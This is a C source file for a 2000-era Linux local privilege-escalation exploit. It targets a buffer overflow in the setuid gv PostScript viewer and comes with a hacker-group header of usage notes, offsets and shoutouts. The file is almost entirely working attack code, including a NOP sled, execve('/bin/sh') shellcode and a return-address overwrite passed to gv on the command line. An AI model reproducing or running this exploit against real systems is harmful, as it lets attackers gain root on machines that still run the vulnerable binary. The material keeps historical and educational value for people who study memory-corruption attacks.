/* 

   linux (/usr/X11R6/bin/gv) local root exploit 
   by slash / buffer0verfl0w security 

   In order for this to work gv (/usr/X11R6/bin/gv) has to be suid and 
   You have to be uid=0. Please don't bitch about the code, I know it's 
   messy, but this is one of my first attempts of writeing an exploit :) 

   Exploit idea gotten from v9. Thanx doud! The important difference 
   between his exploit and this one is that mine works :) Allso thanx 
   to JimJones for makeing this possible for me by giveing me free 
   lectures on buffer overflows :) 
	
   Compile this the old fashion way :) To run this thing simply type: 

   bash# ./linux-gv <offset> 
	
   Note that the default offset(2000) will be used if no offset was 
   provided. Offset 2000 worked for me. Try offset between 1900 and 2300. 

   Shoutouts go to: b0f, zsh, mdma, ADM, #phreak.nl, alan@packetstorm 
   lcamtuf, Lam3rZ, TESO, HWA, funkySh and all the people who know me. 
   Special propz go to Mixter for his help. 

   Dislikes go to: h0lmez (Looking forward to seeing youre implantation 
   		       of the kernel 2.2.14 bug) 
   			 p4riah (Your lameness is nothing compared to your ego) 
   Peace out, 

   -- slash - tcsh@b0f.i-p.com - buffer0verfl0w security 

*/ 

#include <stdio.h> 
#include <stdlib.h> 

#define NOPS 0x90 /* no operation skip to next instruction */ 
#define LEN 276 /* our buffersize */ 

#define GV "/usr/X11R6/bin/gv" /* path to the program */ 
#define OFFSET 2000 /* default offset */ 

char shellcode[] = /* aleph1's shellcode */ 
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" 
  "\x80\xe8\xdc\xff\xff\xff/bin/sh"; 

long 
esp(void) 
{ 
  __asm__("movl %esp,%eax"); 
} 

int 
main(int argc, char **argv) 
{ 

  char buffer[LEN]; 
  int i, offset; 
  long retaddr; 

  printf("Linux (GV) local root exploit\n"); 
  printf("coded by slash / buffer0verfl0w security\n"); 
  printf("<tcsh@b0f.i-p.com> - <b0f.freebsd.lublin.pl>\n"); 

  if (argc > 1) 
  { 
    offset = atoi(argv[1]); 
  } 
  else 
  { 
    offset = OFFSET; 
  } 
  /* Setting up the ret address */ 
  retaddr = (esp() - offset); 

  printf("Using offset: %d.\n", offset); 
  printf("Using return address: 0x%lx.\n", retaddr); 

  for (i = 0; i < LEN; i += 4) 
    *(long *) &buffer[i] = retaddr; 

  /* thanx for the tip {} */ 
  memset(buffer, NOPS, 250 - strlen(shellcode)); 

  /* copy the shellcode into the buffer */ 
  memcpy(buffer + (250 - strlen(shellcode)), shellcode, strlen(shellcode)); 

  /* exec the program */ 
  execl(GV, "gv", "-ad", "-disp", ":0", buffer, 0); 
  return 0; 
} 
/*                   www.hack.co.za   [6 September 2000]*/